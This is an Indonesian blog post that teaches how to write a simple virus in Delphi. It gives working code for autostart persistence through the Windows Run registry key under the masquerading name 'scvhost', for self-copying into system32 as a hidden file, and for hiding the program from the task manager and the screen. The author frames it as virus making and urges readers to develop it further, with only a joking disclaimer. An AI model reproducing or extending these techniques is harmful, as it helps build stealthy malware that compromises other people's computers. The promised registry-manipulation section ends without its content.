Simple aja, karena windows dapat melakukan fungsinya didukung dengan komponen yang dinamakan dengan registry… boleh gak ya registry di katakan sebagai jantung-nya windows?
Mungkin aja sih, karena di dalam registry ini banyak terisi oleh kumpulan data yang rata-rata berfungsi untukmenngatur windows itu sendiri serta software yang sudah di install.
[ berarti registry tu keren yah ]
Benar sekali, dan ketika kita sudah mengetahui fungsi2 dari nilai registry itu maka kita akan dapat menjadi
orang baik ato menjadi orang buruk ! yah katanya tergantung niatnya sieh… hehehehe
Di bawah nanti akan cuba ditampilkan beberapa teknik pembuatan virus dengan Delphi, serta nilai-nilai
manipulasi registry yang biasa di lakukan oleh virus2 lokal… nanti tergantung niatnya lhooo
CREATE VIRUS WITH DELPHI
Pada pembahasan kali ini kita coba membuat virus sederhana dengan Delphi, dengan catatan tolong jangan
di jalankan pada computer teman anda karena dosa itu akan menimpa anda bukan pada penulis.Delphi dapat digunakan untuk mengakses atau mengganti nilai pada registry windows, langsung aja yah : Tambahkan uses registry pada klausa uses.
Uses…..,….., registry;
Coba kita buat agar aplikasi kita ini di jalankan ketika computer pertama kali jalan (ini
hanya contoh
silahkan kembangkan )
Procedure Tform1.FormCreate(Sender: TObject);
var
Reg: TRegistry;
begin
Reg := TRegistry.Create;
try
Reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey(‘\Software\Microsoft\Windows\CurrentVersion\Run’,true);
reg.WriteString(‘scvhost’, Application.ExeName);
reg.CloseKey;
finally
reg.free;
end;
end;
Simpan project anda kemudian jalankan, jika sudah dijalankan coba logoff kemudian
masuk lagi ato restart
ato masuk ke msconfig dan lihat hasilnya. Mudah kan, untuk nilai-nilai yang lain silahkan
anda coba
sendiri…
Biasanya virus lokal ketika jalan melakukan duplikasi diri ? pake Delphi bisa gak sih?
Bisa banget, nah klo
pake delhpi gini caranya :
Misalnya kita pake komponen timer dengan property interval 50000 6 maksudnya
melakukan proses copy
file tiap 5 detik
…..
Begin
copyFile(PAnsiChar('.\'+ExtractFileName(application.ExeName)),'C:\Windows\system32
\mangga3.exe',false);
FileSetAttr('C:\Windows\mangga3.exe',faHidden);
end;
tar tinggal anda kembangkan yah…. Nilai atribut file dapat juga anda modifikasi ! baca
aja di help bawaan
Delphi untuk mengetahi nilai2 apa aja sih yang ada
So sweat 6
Biasanya kan virus gak bisa kelihat di task manager ? trus klo di shift+tab juga gak ada
trus biasanya
aplikasi virus ketika aktif gak kelihatan, klo pake Delphi bisa gak? Hehehe Delphi gitu
loh ya iyalah malah
programnya hanya 2 baris lagi
Bwt project baru kemudian buka project-nya caranya tekan ctrl+F12 trus pilih projectnya
nanti akan
muncul seperti tampiln project1 di bawah ini :
program Project1;
uses
Forms,
Unit1 in 'Unit1.pas' {Form1};
{$R *.res}
begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
end.
Setelah itu kita modifikasi sehingga berubah menjadi :
program Project1;
uses
Forms,
Unit1 in 'Unit1.pas' {Form1};
{$R *.res}
begin
Application.Initialize;
Application.Title:=''; //gak kelihatan di task manager
Application.CreateForm(TForm1, Form1);
Application.ShowMainForm:=false; // form utamanya gak kelihatan waktu prosesnya
berjalan
Application.Run;
end.
Simple gak? Hanya mungkin aplikasi yang kita bwt lebih besar ukurannya ketimbang
yang dibwt pake vb
Getoh… yang lainnya silahkan anda kembangkan sendiri, pokoe gunakan internet
semaksimal mungkin
untuk menguak semua informasi.
Katanya klo artikel dalam internet di jadikan buku benerana ato di cetak maka dunia akan
penuh, pecaya
gak? Saya sih masih gak pecaya kan blom di buktikan 6
Manipulasi Registry
Manipulasi ini rata-rata dipake pada aplikasi virus. Maaf yah klo bahasanya pake bahasa
inggris padahal
penulis gak bisa bahasa inggris….
Coba sendiri yah n good luck
Tidak ada komentar:
Posting Komentar